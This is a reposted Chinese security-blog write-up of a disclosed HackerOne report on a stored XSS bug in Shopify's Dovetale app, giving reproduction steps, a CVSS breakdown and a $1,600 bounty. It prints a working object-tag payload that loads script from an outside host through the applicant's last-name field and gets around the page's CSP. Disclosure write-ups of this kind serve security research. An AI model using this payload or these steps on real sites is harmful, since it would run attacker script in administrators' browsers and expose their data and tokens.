【$1600】Shopify最近披露的一处存储型XSS漏洞

admin 2022年12月1日14:26:23评论76 views字数 1684阅读5分36秒阅读模式

声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。


背景介绍:


最新Shopify在HackerOne上对4个月前的一处存储型XSS漏洞进行了公开披露,让我们一起来看看这个漏洞吧。


漏洞概要:


Dovetale 是 Shopify 的一个影响力管理平台,用于管理和扩展‘网红’营销,有影响力的人可以申请成为品牌大使,如果恶意创建者在名字、姓氏等中使用 XSS Payloads,数据将被存储并呈现给 Dovetale 应用程序区域内的品牌管理员。当管理员批准应用程序时,HTML-/JavaScript 最终被触发。

被用于测试的网站URL是:

19kun-24.myshopify.com

漏洞复现:

先决条件:需要“真实”订阅 Shopify 计划(例如基本计划)才能获得相关权限,仅仅创建开发商店在某种程度上是不够的。

1、(受害者)为其商店安装 Dovetale 应用程序,创建 Dovetale 帐户并将其链接到特定商店。

2、(受害者)创建一个适当的申请页面并复制成为品牌大使的申请链接

【$1600】Shopify最近披露的一处存储型XSS漏洞


3、(攻击者)在新的浏览器实例中打开链接并按照应用程序进行操作,例如,使用现有的 Instagram 帐户申请

4、(攻击者)现在是填写你个人数据的时候了,将 XSS Payloads用于你的姓氏栏,

<object type="text/x-scriptlet" data="https://xss.rocks/scriptlet.html"></object>

【$1600】Shopify最近披露的一处存储型XSS漏洞


5、(攻击者)完成并提交申请,之后需要验证电子邮件地址

6、(受害人)此时应该已经收到申请,点击“批准”按钮

【$1600】Shopify最近披露的一处存储型XSS漏洞

7、(受害者)现在可以创建欢迎电子邮件,由于编辑器的清理,XSS Payloads不会在这里触发

【$1600】Shopify最近披露的一处存储型XSS漏洞

但是如果单击了“Next Welcome package”>“Next Review”,将再次显示电子邮件并执行 JavaScript 代码:

【$1600】Shopify最近披露的一处存储型XSS漏洞

注意:页面的CSP已通过使用对象标记成功绕过,因为CSP并不会阻止这种情况。


漏洞危害:


  • 在受害者的浏览器中执行JavaScript代码

  • 泄露机密数据,也有可能窃取其他申请者的数据或CSRF-令牌等数据

  • 通过HTML注入对网站进行破坏

  • 仿冒


CVSS3.0 漏洞评分:

Base Score CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N 5.4

Environment: Non-Core (Modified by CR:L/IR:L/AR:L) 4.2

Attack Complexity: L

  • Specific conditions or measurable effort to exploit?: No

Privileges Required: N

  • Requires privileged account (not self-registered)?: No

User Interaction: R

  • Requires victim to perform some action during exploit?: Yes

Scope: U

  • Can the attacker impact a separate service?: No

Confidentiality: L

  • How much data could be accessed?: Most or All

  • How much of Shopify is impacted?: Some

Integrity: L

  • How much data could be changed?: Most or All

  • How much of Shopify is impacted?: Some

Availability: N

  • Level of disruption to network service?: None


该报在hackerone上的地址是:

https://hackerone.com/reports/1652046

Shopify 依据 CVSS3.0 计算,最终奖励白帽 kun_19 共计$1,600的赏金奖励。

====正文结束====


原文始发于微信公众号(骨哥说事):【$1600】Shopify最近披露的一处存储型XSS漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月1日14:26:23
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【$1600】Shopify最近披露的一处存储型XSS漏洞https://cn-sec.com/archives/1437086.html

发表评论

匿名网友 填写信息